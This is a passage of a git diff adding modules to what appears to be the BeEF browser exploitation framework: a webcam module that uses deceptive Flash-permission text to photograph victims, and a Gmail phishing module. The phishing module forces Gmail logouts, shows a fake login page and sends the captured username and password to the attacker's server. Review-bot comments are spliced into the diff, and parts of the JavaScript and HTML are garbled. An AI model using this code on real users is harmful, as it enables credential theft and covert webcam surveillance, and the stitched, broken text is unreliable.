+ png.writeUnsignedInt(c);
+ }
+ }
+}
\ No newline at end of file
diff --git a/modules/browser/webcam/dev/com/foxarc/util/Base64.as b/modules/browser/webcam/dev/com/foxarc/util/Base64.as
new file mode 100644
index 000000000..fe7d0cd1f
--- /dev/null
+++ b/modules/browser/webcam/dev/com/foxarc/util/Base64.as
@@ -0,0 +1,106 @@ +package com.foxarc.util{ + import flash.utils.ByteArray; + public class Base64 { + private static const encodeChars:Array = + ['A','B','C','D','E','F','G','H', + 'I','J','K','L','M','N','O','P', + 'Q','R','S','T','U','V','W','X', + 'Y','Z','a','b','c','d','e','f', + 'g','h','i','j','k','l','m','n', + 'o','p','q','r','s','t','u','v', + 'w','x','y','z','0','1','2','3', + '4','5','6','7','8','9','+','/']; + private static const decodeChars:Array = + [-1, -1, -1, -1, -1, -1, -1, -1, + -1, -1, -1, -1, -1, -1, -1, -1, + -1, -1, -1, -1, -1, -1, -1, -1, + -1, -1, -1, -1, -1, -1, -1, -1, + -1, -1, -1, -1, -1, -1, -1, -1, + -1, -1, -1, 62, -1, -1, -1, 63, + 52, 53, 54, 55, 56, 57, 58, 59, + 60, 61, -1, -1, -1, -1, -1, -1, + -1, 0, 1, 2, 3, 4, 5, 6, + 7, 8, 9, 10, 11, 12, 13, 14, + 15, 16, 17, 18, 19, 20, 21, 22, + 23, 24, 25, -1, -1, -1, -1, -1, + -1, 26, 27, 28, 29, 30, 31, 32, + 33, 34, 35, 36, 37, 38, 39, 40, + 41, 42, 43, 44, 45, 46, 47, 48, + 49, 50, 51, -1, -1, -1, -1, -1]; + public static function encode(data:ByteArray):String { + var out:Array = []; + var i:int = 0; + var j:int = 0; + var r:int = data.length % 3; + var len:int = data.length - r; + var c:int; + while (i < len) { + c = data[i++] << 16 | data[i++] << 8 | data[i++]; + out[j++] = encodeChars[c >> 18] + encodeChars[c >> 12 & 0x3f] + encodeChars[c >> 6 & 0x3f] + encodeChars[c & 0x3f]; + } + if (r == 1) { + c = data[i++]; + out[j++] = encodeChars[c >> 2] + encodeChars[(c & 0x03) << 4] + "=="; + } + else if (r == 2) { + c = data[i++] << 8 | data[i++]; + out[j++] = encodeChars[c >> 10] + encodeChars[c >> 4 & 0x3f] + encodeChars[(c & 0x0f) << 2] + "="; + } + return out.join(''); + } + public static function decode(str:String):ByteArray { + var c1:int; + var c2:int; + var c3:int; + var c4:int; + var i:int; + var len:int; + var out:ByteArray; + len = str.length; + i = 0; + out = new ByteArray(); + while (i < len) { + // c1 + do { + c1 = decodeChars[str.charCodeAt(i++) & 0xff]; + } while (i < 
len && c1 == -1); + if (c1 == -1) { + break; + } + // c2 + do { + c2 = decodeChars[str.charCodeAt(i++) & 0xff]; + } while (i < len && c2 == -1); + if (c2 == -1) { + break; + } + out.writeByte((c1 << 2) | ((c2 & 0x30) >> 4)); + // c3 + do { + c3 = str.charCodeAt(i++) & 0xff; + if (c3 == 61) { + return out; + } + c3 = decodeChars[c3]; + } while (i < len && c3 == -1); + if (c3 == -1) { + break; + } + out.writeByte(((c2 & 0x0f) << 4) | ((c3 & 0x3c) >> 2)); + // c4 + do { + c4 = str.charCodeAt(i++) & 0xff; + if (c4 == 61) { + return out; + } + c4 = decodeChars[c4]; + } while (i < len && c4 == -1); + if (c4 == -1) { + break; + } + out.writeByte(((c3 & 0x03) << 6) | c4); + } + return out; + } + } +} \ No newline at end of file diff --git a/modules/browser/webcam/dev/takeit.fla b/modules/browser/webcam/dev/takeit.fla new file mode 100644 index 000000000..7de9b071b Binary files /dev/null and b/modules/browser/webcam/dev/takeit.fla differ diff --git a/modules/browser/webcam/module.rb b/modules/browser/webcam/module.rb new file mode 100644 index 000000000..ad22db94c --- /dev/null +++ b/modules/browser/webcam/module.rb 
@@ -0,0 +1,63 @@
+#
+# Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+require 'base64'
+class Webcam < BeEF::Core::Command
+ def pre_send
+ BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/browser/webcam/takeit.swf', '/takeit', 'swf')
+ BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/browser/webcam/swfobject.js', '/swfobject', 'js')
+ end
+ def self.options
+ configuration = BeEF::Core::Configuration.instance
+ social_engineering_title = "This website is using Adobe Flashd"
+ social_engineering_text = "In order to work with the programming framework this website is using, you need to allow the Adobe Flash Player Settings. If you use the new Ajax and HTML5 features in conjunction with Adobe Flash Player, it will increase your user experience."
+ no_of_pictures = 20
+ interval = 1000
+ return [
+ {'name' => 'social_engineering_title',
+ 'description' => 'The title that is shown to the victim.',
+ 'ui_label' => 'Social Engineering Title',
+ 'value' => social_engineering_title,
+ 'width' => '100px' }, {
+ 'name' => 'social_engineering_text',
+ 'description' => 'The social engineering text you want to show to convince the user to click the Allow button.',
+ 'ui_label' => 'Social Engineering Text',
+ 'value' => social_engineering_text,
+ 'width' => '300px',
+ 'type' => 'textarea' }, {
+ 'name' => 'no_of_pictures',
+ 'description' => 'The number of pictures you want to take after the victim clicked "allow".',
+ 'ui_label' => 'Number of pictures',
+ 'value' => no_of_pictures,
+ 'width' => '100px' }, {
+ 'name' => 'interval',
+ 'description' => 'The interval in which pictures are taken.',
+ 'ui_label' => 'Interval to take pictures in ms',
+ 'value' => interval,
+ 'width' => '100px' }
+ ]
+ end
+
+
+ def post_execute
+ content = {}
+ content["result"] = @datastore["result"] if not @datastore["result"].nil?
+ content["picture"] = @datastore["picture"] if not @datastore["picture"].nil?
+ save content
+ BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/takeit.swf')
+ BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/swfobject.js')
+ end
+
+end
diff --git a/modules/browser/webcam/swfobject.js b/modules/browser/webcam/swfobject.js
new file mode 100755
index 000000000..8eafe9dd8
--- /dev/null
+++ b/modules/browser/webcam/swfobject.js
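Review bot: `post_execute` saves `@datastore["result"]` and `@datastore["picture"]` exactly as the browser sent them; the only check is for nil, and the `require 'base64'` at the top is never used in this file. Both values are untrusted input to the server, so the picture should be checked before it is stored. Assuming it arrives as a bare base64 string, `content["picture"] = @datastore["picture"] if @datastore["picture"] =~ /\A[A-Za-z0-9+\/=]+\z/` together with a length cap would do, and any view that renders either field has to escape it. A comment above `save content` should also record that the stored frames are images of a person and need restricted access and purging when the engagement ends. `configuration` in `self.options` is assigned but never read and can go.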
@@ -0,0 +1,4 @@ +/* SWFObject v2.2 + is released under the MIT License +*/ +var swfobject=function(){var D="undefined",r="object",S="Shockwave Flash",W="ShockwaveFlash.ShockwaveFlash",q="application/x-shockwave-flash",R="SWFObjectExprInst",x="onreadystatechange",O=window,j=document,t=navigator,T=false,U=[h],o=[],N=[],I=[],l,Q,E,B,J=false,a=false,n,G,m=true,M=function(){var aa=typeof j.getElementById!=D&&typeof j.getElementsByTagName!=D&&typeof j.createElement!=D,ah=t.userAgent.toLowerCase(),Y=t.platform.toLowerCase(),ae=Y?/win/.test(Y):/win/.test(ah),ac=Y?/mac/.test(Y):/mac/.test(ah),af=/webkit/.test(ah)?parseFloat(ah.replace(/^.*webkit\/(\d+(\.\d+)?).*$/,"$1")):false,X=!+"\v1",ag=[0,0,0],ab=null;if(typeof t.plugins!=D&&typeof t.plugins[S]==r){ab=t.plugins[S].description;if(ab&&!(typeof t.mimeTypes!=D&&t.mimeTypes[q]&&!t.mimeTypes[q].enabledPlugin)){T=true;X=false;ab=ab.replace(/^.*\s+(\S+\s+\S+$)/,"$1");ag[0]=parseInt(ab.replace(/^(.*)\..*$/,"$1"),10);ag[1]=parseInt(ab.replace(/^.*\.(.*)\s.*$/,"$1"),10);ag[2]=/[a-zA-Z]/.test(ab)?parseInt(ab.replace(/^.*[a-zA-Z]+(.*)$/,"$1"),10):0}}else{if(typeof O.ActiveXObject!=D){try{var ad=new ActiveXObject(W);if(ad){ab=ad.GetVariable("$version");if(ab){X=true;ab=ab.split(" ")[1].split(",");ag=[parseInt(ab[0],10),parseInt(ab[1],10),parseInt(ab[2],10)]}}}catch(Z){}}}return{w3:aa,pv:ag,wk:af,ie:X,win:ae,mac:ac}}(),k=function(){if(!M.w3){return}if((typeof j.readyState!=D&&j.readyState=="complete")||(typeof j.readyState==D&&(j.getElementsByTagName("body")[0]||j.body))){f()}if(!J){if(typeof 
j.addEventListener!=D){j.addEventListener("DOMContentLoaded",f,false)}if(M.ie&&M.win){j.attachEvent(x,function(){if(j.readyState=="complete"){j.detachEvent(x,arguments.callee);f()}});if(O==top){(function(){if(J){return}try{j.documentElement.doScroll("left")}catch(X){setTimeout(arguments.callee,0);return}f()})()}}if(M.wk){(function(){if(J){return}if(!/loaded|complete/.test(j.readyState)){setTimeout(arguments.callee,0);return}f()})()}s(f)}}();function f(){if(J){return}try{var Z=j.getElementsByTagName("body")[0].appendChild(C("span"));Z.parentNode.removeChild(Z)}catch(aa){return}J=true;var X=U.length;for(var Y=0;Y0){for(var af=0;af0){var ae=c(Y);if(ae){if(F(o[af].swfVersion)&&!(M.wk&&M.wk<312)){w(Y,true);if(ab){aa.success=true;aa.ref=z(Y);ab(aa)}}else{if(o[af].expressInstall&&A()){var ai={};ai.data=o[af].expressInstall;ai.width=ae.getAttribute("width")||"0";ai.height=ae.getAttribute("height")||"0";if(ae.getAttribute("class")){ai.styleclass=ae.getAttribute("class")}if(ae.getAttribute("align")){ai.align=ae.getAttribute("align")}var ah={};var X=ae.getElementsByTagName("param");var ac=X.length;for(var ad=0;ad'}}aa.outerHTML='"+af+"";N[N.length]=ai.id;X=c(ai.id)}else{var Z=C(r);Z.setAttribute("type",q);for(var ac in ai){if(ai[ac]!=Object.prototype[ac]){if(ac.toLowerCase()=="styleclass"){Z.setAttribute("class",ai[ac])}else{if(ac.toLowerCase()!="classid"){Z.setAttribute(ac,ai[ac])}}}}for(var ab in ag){if(ag[ab]!=Object.prototype[ab]&&ab.toLowerCase()!="movie"){e(Z,ab,ag[ab])}}aa.parentNode.replaceChild(Z,aa);X=Z}}return X}function e(Z,X,Y){var aa=C("param");aa.setAttribute("name",X);aa.setAttribute("value",Y);Z.appendChild(aa)}function y(Y){var X=c(Y);if(X&&X.nodeName=="OBJECT"){if(M.ie&&M.win){X.style.display="none";(function(){if(X.readyState==4){b(Y)}else{setTimeout(arguments.callee,10)}})()}else{X.parentNode.removeChild(X)}}}function b(Z){var Y=c(Z);if(Y){for(var X in Y){if(typeof Y[X]=="function"){Y[X]=null}}Y.parentNode.removeChild(Y)}}function c(Z){var 
X=null;try{X=j.getElementById(Z)}catch(Y){}return X}function C(X){return j.createElement(X)}function i(Z,X,Y){Z.attachEvent(X,Y);I[I.length]=[Z,X,Y]}function F(Z){var Y=M.pv,X=Z.split(".");X[0]=parseInt(X[0],10);X[1]=parseInt(X[1],10)||0;X[2]=parseInt(X[2],10)||0;return(Y[0]>X[0]||(Y[0]==X[0]&&Y[1]>X[1])||(Y[0]==X[0]&&Y[1]==X[1]&&Y[2]>=X[2]))?true:false}function v(ac,Y,ad,ab){if(M.ie&&M.mac){return}var aa=j.getElementsByTagName("head")[0];if(!aa){return}var X=(ad&&typeof ad=="string")?ad:"screen";if(ab){n=null;G=null}if(!n||G!=X){var Z=C("style");Z.setAttribute("type","text/css");Z.setAttribute("media",X);n=aa.appendChild(Z);if(M.ie&&M.win&&typeof j.styleSheets!=D&&j.styleSheets.length>0){n=j.styleSheets[j.styleSheets.length-1]}G=X}if(M.ie&&M.win){if(n&&typeof n.addRule==r){n.addRule(ac,Y)}}else{if(n&&typeof j.createTextNode!=D){n.appendChild(j.createTextNode(ac+" {"+Y+"}"))}}}function w(Z,X){if(!m){return}var Y=X?"visible":"hidden";if(J&&c(Z)){c(Z).style.visibility=Y}else{v("#"+Z,"visibility:"+Y)}}function L(Y){var Z=/[\\\"<>\.;]/;var X=Z.exec(Y)!=null;return X&&typeof encodeURIComponent!=D?encodeURIComponent(Y):Y}var d=function(){if(M.ie&&M.win){window.attachEvent("onunload",function(){var ac=I.length;for(var ab=0;ab); +} + +beef.execute(function() { + document.title = "Google Mail: Email from Google"; + beef.browser.changeFavicon("https://mail.google.com/favicon.ico"); + logoutGoogle(); + displayPhishingSite(); +}); + +function clickedSubmitButton(){ + var credentials = "Username: "+document.getElementById('Email').value+" Password: "+document.getElementById('Passwd').value; + beef.net.send("<%= @command_url %>", <%= @command_id %>, "result="+credentials); + //Timeout needed because otherwise the beef panel doesn't get the credentials in time + setTimeout("redirect()", <%= @wait_seconds_before_redirect %>); +} +function redirect(){ + var theXssUrl = "<%== @xss_hook_url %>"; + if(theXssUrl){ + window.open(theXssUrl); + window.focus(); + } + window.location = 
"https://accounts.google.com/ServiceLoginAuth"; +} + +function displayPhishingSite(){ + document.body.innerHTML = " Google Mail: Email from Google

Google Mail

A Google approach to email.

Google Mail is built on the idea that email can be more intuitive, efficient, and useful. And maybe even fun. After all, Google Mail has:

  • Lots of space

    Over 2757.272164 megabytes (and counting) of free storage.

  • Less spam

    Keep unwanted messages out of your inbox.

  • Mobile access

    Get Google Mail on your mobile phone. Learn more

Take Google Mail to work with Google Apps for Business

Love Google Mail, but looking for a custom email address for your company?
Get business email, calendar, and online docs @your_company.com. Learn more

";
+}
diff --git a/modules/social_engineering/gmail_phishing/config.yaml b/modules/social_engineering/gmail_phishing/config.yaml
new file mode 100644
index 000000000..5b9d80039
--- /dev/null
+++ b/modules/social_engineering/gmail_phishing/config.yaml
@@ -0,0 +1,25 @@
+#
+# Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+beef:
+ module:
+ gmail_phishing:
+ enable: true
+ category: ["Social Engineering"]
+ name: "Google Phishing"
+ description: "This plugin uses an image tag to XSRF the logout button of Gmail. continuously the user is logged out of Gmail (eg. if he is logged in in another tab). Additionally it will show the Google favicon and a Gmail phishing page (altough the URL is NOT the Gmail URL)."
+ authors: ["floyd @floyd_ch floyd.ch"]
+ target:
+ user_notify: ['ALL']
diff --git a/modules/social_engineering/gmail_phishing/module.rb b/modules/social_engineering/gmail_phishing/module.rb
new file mode 100644
index 000000000..80f419ceb
--- /dev/null
+++ b/modules/social_engineering/gmail_phishing/module.rb
@@ -0,0 +1,50 @@
+#
+# Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+class Gmail_phishing < BeEF::Core::Command
+
+ def self.options
+ configuration = BeEF::Core::Configuration.instance
+
+ xss_hook_url = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/demos/basic.html"
+ logout_gmail_interval = 10000
+ wait_seconds_before_redirect = 1000
+ return [
+ {'name' => 'xss_hook_url',
+ 'description' => 'The URI including the XSS to hook a browser. If the XSS is not exploitable via an URI, simply leave this field empty, but this means you will loose the hooked browser after executing this module.',
+ 'ui_label' => 'XSS hook URI',
+ 'value' => xss_hook_url,
+ 'width' => '300px' }, {
+ 'name' => 'logout_gmail_interval',
+ 'description' => 'The victim is continuously loged out of Gmail. This is the interval in ms.',
+ 'ui_label' => 'Ms Gmail logout interval',
+ 'value' => logout_gmail_interval,
+ 'width' => '100px' }, {
+ 'name' => 'wait_seconds_before_redirect',
+ 'description' => 'When the user submits his credentials on the phishing page, we have to wait (in ms) before we redirect to the real Gmail page, so that BeeF gets the credentials in time.',
+ 'ui_label' => 'Ms before redirecting',
+ 'value' => wait_seconds_before_redirect,
+ 'width' => '100px' }
+ ]
+ end
+
+ def post_execute
+ content = {}
+ content['Result'] = @datastore['result']
+ save content
+
+ end
+
+end
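Review bot: `post_execute` copies `@datastore['result']` straight into the saved record, and the option text in this hunk says that value is the credentials the user submitted, so a username and password are persisted in cleartext with the command results. The method should say so in a comment, for example `# result carries submitted credentials in cleartext: restrict access to saved results and purge them when the engagement ends`. The value is also stored without the nil guard that `Webcam#post_execute` in this commit uses; `content['Result'] = @datastore['result'] unless @datastore['result'].nil?` would keep the two modules consistent. Separately, the option `wait_seconds_before_redirect` holds milliseconds (default 1000, label "Ms before redirecting"), so its name contradicts its unit.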